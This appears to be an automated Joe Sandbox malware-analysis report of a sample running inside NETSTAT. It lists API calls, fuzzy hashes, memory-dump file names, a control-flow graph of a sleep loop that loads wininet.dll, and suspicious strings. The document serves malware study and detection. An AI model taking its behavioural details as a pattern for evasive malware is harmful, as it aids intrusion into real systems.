                                                      • Instruction ID: 8eaa9b024993cf4ee14627b82418a6798cacacced8b22b3a964631dce9632863
                                                      • Opcode Fuzzy Hash: cf00df1e9b3e13202d80378ec7fa8627bc819169e84eb9ca6fd6a41da5ee3b37
                                                      • Instruction Fuzzy Hash: 8811A0756417047AD620EB68CC41FEF77ACDFC5710F008559F918AB280D7747A05C7A1
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03069577
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 16438b44b275c9976e4716856ae0e69e9a9a3046ef102e8abef346e4b69bb212
                                                      • Instruction ID: 113ec79b63d113b1f425b94705ac14f2529833ce4dffeca55a3199b7ec4d32b3
                                                      • Opcode Fuzzy Hash: 16438b44b275c9976e4716856ae0e69e9a9a3046ef102e8abef346e4b69bb212
                                                      • Instruction Fuzzy Hash: C6E0467A2012047BCA20FA59DC01FDB77ACDFC9764F408459FA08AB241C774BA4186E4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                      • Instruction ID: 00b697b3417dd74e0bf95109ca0d8c4ac07c7e1c85739c882d52e16923c875e0
                                                      • Opcode Fuzzy Hash: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                                                      • Instruction Fuzzy Hash: 2490023160990412A140B1584898946404997E0301B55C011E0424554C8B558A565361
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                      • Instruction ID: 071c25e6e6e696cbf06b1d04839d0248360b4f19c6547838f646a8b066474913
                                                      • Opcode Fuzzy Hash: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                                                      • Instruction Fuzzy Hash: 56900261605604425140B1584818806604997E1301395C115E0554560C875989559369
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                      • Instruction ID: ab7194a2acf3d615906986d39479fd5b2bd464d25c01ec18b8f109d475a0fc58
                                                      • Opcode Fuzzy Hash: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                                                      • Instruction Fuzzy Hash: 0490023160950C02E150B1584428B46004987D0301F55C011E0024654D87968B5577A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                      • Instruction ID: ba5173fb01be06699076b89bafdc9949885677a42d2b4041bef8ea93a2580b05
                                                      • Opcode Fuzzy Hash: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                                                      • Instruction Fuzzy Hash: 9F90023120550C02E180B1584418A4A004987D1301F95C015E0025654DCB568B5977A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                      • Instruction ID: 09aa2b58da5100a06c4d0bbf31caf1d3b0347e05125ddf624cc974b40c8af49a
                                                      • Opcode Fuzzy Hash: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                                                      • Instruction Fuzzy Hash: 4790023120954C42E140B1584418E46005987D0305F55C011E0064694D97668E55B761
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                      • Instruction ID: dce561f7d4a38ba3f7003e70b45de958e4bad780b40a988f708e06cf5a49f07a
                                                      • Opcode Fuzzy Hash: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                                                      • Instruction Fuzzy Hash: 9B900261206504035105B1584428A16404E87E0201B55C021E1014590DC66689916225
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                      • Instruction ID: b3d3959fe93c6281ae7fd06fcd410188bc34b19220ae16e50c6f03d21c61dd90
                                                      • Opcode Fuzzy Hash: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                                                      • Instruction Fuzzy Hash: 3E900435315504031105F55C071CD0700CFC7D5351355C031F1015550CD773CD715331
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                      • Instruction ID: e7d3dcbb9dff8109d5b77cb91799384e26efbbd368afc7e05df0448f0ea7e9eb
                                                      • Opcode Fuzzy Hash: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                                                      • Instruction Fuzzy Hash: 18900225225504021145F558061890B048997D6351395C015F1416590CC76289655321
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                      • Instruction ID: cac63d534eb0c682d7eb4e7c36e6e7945f2a5836108b3edad2808207d4f19c9a
                                                      • Opcode Fuzzy Hash: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                                                      • Instruction Fuzzy Hash: E2900221605504425140B1688858D064049ABE1211755C121E0998550D869A89655765
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                      • Instruction ID: a7ffa00478660fcf416fe169745c48bb608cca0e8fcb500fe4bce194018ead2f
                                                      • Opcode Fuzzy Hash: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                                                      • Instruction Fuzzy Hash: 51900221215D0442E200B5684C28F07004987D0303F55C115E0154554CCA5689615621
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                      • Instruction ID: 4634d928edb80c507da2a510888a7ad114c6b70419b4c4f8648e91ffa4c604de
                                                      • Opcode Fuzzy Hash: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                                                      • Instruction Fuzzy Hash: 2890026134550842E100B1584428F060049C7E1301F55C015E1064554D875ACD526226
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                      • Instruction ID: d61c35260e4ae7ee59d24c7678558a597342336f498a9b763353f53ba785a562
                                                      • Opcode Fuzzy Hash: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                                                      • Instruction Fuzzy Hash: 0590022160550902E101B1584418A16004E87D0241F95C022E1024555ECB668A92A231
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                      • Instruction ID: cdc359fb419f31ede06ec35bf55b977a984cd7dccc9e5fe65c82af83c17d1306
                                                      • Opcode Fuzzy Hash: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                                                      • Instruction Fuzzy Hash: BF90026120590803E140B5584818A07004987D0302F55C011E2064555E8B6A8D516235
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                      • Instruction ID: 0049fd52dbc39495122bdf08b76650b3d3ffb2bb183a6f942458c708b0caaf84
                                                      • Opcode Fuzzy Hash: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                                                      • Instruction Fuzzy Hash: 3F900221246545526545F1584418907404A97E0241795C012E1414950C86679956D721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                      • Instruction ID: d6a55aa4b4b60a4bc1483da3ac20d7fd618ceb2b2da3ba1e13018dcd360c9c6c
                                                      • Opcode Fuzzy Hash: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                                                      • Instruction Fuzzy Hash: 5890023120550813E111B1584518B07004D87D0241F95C412E0424558D97978A52A221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                      • Instruction ID: af1a02e22924812977476bb0c2aae43e28e92c2176a4e06d2af289e133af31e8
                                                      • Opcode Fuzzy Hash: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                                                      • Instruction Fuzzy Hash: 7B90022921750402E180B158541CA0A004987D1202F95D415E0015558CCA5689695321
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                      • Instruction ID: e3aff0bee90bf05031d8ad9230dc96257f8e499e2323c346cf2ed464f9a4023d
                                                      • Opcode Fuzzy Hash: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                                                      • Instruction Fuzzy Hash: 3690022130550403E140B158542CA064049D7E1301F55D011E0414554CDA5689565322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                      • Instruction ID: 27e948ba4c3b553fc8cb9ee2978f4e6b61da8d50f99a38ba449d59527a6f87e1
                                                      • Opcode Fuzzy Hash: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                                                      • Instruction Fuzzy Hash: 6A90023120550802E100B598541CA46004987E0301F55D011E5024555EC7A689916231
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                      • Instruction ID: 98172ed4f2815d0427bf654bb5cfab9b62ea8356319cb310a722b5972f1a69c8
                                                      • Opcode Fuzzy Hash: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                                                      • Instruction Fuzzy Hash: 0590023120558C02E110B1588418B4A004987D0301F59C411E4424658D87D689917221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                      • Instruction ID: f6290172e3e94e25e6b5e036ab7bbd1c516736702c71da16ba6ec2b21ab93038
                                                      • Opcode Fuzzy Hash: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                                                      • Instruction Fuzzy Hash: 8890023120550C42E100B1584418F46004987E0301F55C016E0124654D8756C9517621
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                      • Instruction ID: 3963b5324cbc31f56a9c98aaf5695fdabb434fa984d88ada361499a0d93a24e7
                                                      • Opcode Fuzzy Hash: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                                                      • Instruction Fuzzy Hash: 1690023160960802E100B1584528B06104987D0201F65C411E0424568D87D68A5166A2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                      • Instruction ID: 589c0370722e23713c11ead713f0e3533cf07478b06ad497c0608540c44abedc
                                                      • Opcode Fuzzy Hash: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                                                      • Instruction Fuzzy Hash: E590022124955502E150B15C4418A164049A7E0201F55C021E0814594D869689556321

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 498 3063c60-3063ca8 call 306b530 501 3063db4-3063dba 498->501 502 3063cae-3063d24 call 306b610 call 3054660 call 3041410 call 3061dc0 498->502 511 3063d30-3063d44 Sleep 502->511 512 3063d46-3063d58 511->512 513 3063da5-3063dac 511->513 514 3063d7a-3063d93 call 30661b0 512->514 515 3063d5a-3063d78 call 3066110 512->515 513->511 516 3063dae 513->516 520 3063d98-3063d9b 514->520 515->520 516->501 520->513
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 03063D3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: S,l$net.dll$wininet.dll
                                                      • API String ID: 3472027048-2096600126
                                                      • Opcode ID: 06aad819db55b54cb73b31747650b45bac9d94ca89ec9b38f7a1309c933c6986
                                                      • Instruction ID: 6534d6fb4bb7de48b5a6a877580008a39d303e5a89402d9f1b7cf29b2266ca22
                                                      • Opcode Fuzzy Hash: 06aad819db55b54cb73b31747650b45bac9d94ca89ec9b38f7a1309c933c6986
                                                      • Instruction Fuzzy Hash: D431B2B5A01309BBD714DFA4D880FEBB7B8FB84700F04856CEA59AF245D670A640CBE4

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
